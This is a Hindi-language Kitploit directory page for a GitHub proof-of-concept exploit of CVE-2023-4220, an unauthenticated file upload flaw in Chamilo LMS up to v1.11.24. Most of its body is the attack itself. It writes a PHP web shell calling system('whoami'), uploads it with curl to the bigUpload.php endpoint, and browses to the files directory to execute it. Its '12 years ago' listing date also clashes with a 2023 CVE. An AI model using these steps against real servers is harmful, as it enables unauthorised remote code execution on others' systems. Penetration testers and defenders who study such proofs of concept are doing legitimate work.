Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220 — CVE-2023-4220 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण: Chamilo LMS में अप्रमाणित फ़ाइल अपलोड जो वेब शेल तैनाती के माध्यम से संग्रहीत XSS और दूरस्थ कोड निष्पादन सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/dollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubdollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220

Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220

CVE-2023-4220 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण: Chamilo LMS में अप्रमाणित फ़ाइल अपलोड जो वेब शेल तैनाती के माध्यम से संग्रहीत XSS और दूरस्थ कोड निष्पादन सक्षम करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखेंवेबसाइट
12 साल पहलेअभी तक समीक्षित नहीं
साझा करें

Chamilo-LMS-अप्रमाणित-फ़ाइल-अपलोड-

बड़ी फ़ाइल अपलोड कार्यक्षमता में अप्रतिबंधित फ़ाइल अपलोड /main/inc/lib/javascript/bigupload/inc/bigUpload.php में Chamilo LMS <= v1.11.24 में अप्रमाणित हमलावरों को संग्रहीत क्रॉस-साइट स्क्रिप्टिंग हमले करने और वेब शेल अपलोड करके दूरस्थ कोड निष्पादन प्राप्त करने की अनुमति देता है।

प्रभावित संस्करण ≤v1.11.24

CVE पहचानकर्ता CVE-2023-4220

भेद्यता सारांश

बड़ी फ़ाइल अपलोड कार्यक्षमता /main/inc/lib/javascript/bigupload/inc/bigUpload.php द्वारा वेब रूट के अंतर्गत /main/inc/lib/javascript/bigupload/files निर्देशिका में मनमानी फ़ाइलें अपलोड करने की अनुमति देती है।

प्रमाण-अवधारणा
  • यदि /main/inc/lib/javascript/bigupload/files निर्देशिका मौजूद है तो हम मनमानी फ़ाइल अपलोड कर सकते हैं;

  • एक दुर्भावनापूर्ण php फ़ाइल बनाएँ echo '<?php system("whoami"); ?>' > dollarboysushil.php Untitled (1).png

  • फिर हम निम्नलिखित कमांड जारी करके इस फ़ाइल को अपलोड कर सकते हैं

    root@kitploit:~
    `$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'` 
    

    Untitled (1).png

  • हम /main/inc/lib/javascript/bigupload/files निर्देशिका पर जाकर जांच सकते हैं कि हमारी फ़ाइल अपलोड हुई है या नहीं Untitled (1).png

  • और हम php फ़ाइल पर क्लिक करके इसे निष्पादित कर सकते हैं, जो whoami कमांड का आउटपुट देती है Untitled (1).png

टूल डाउनलोड करें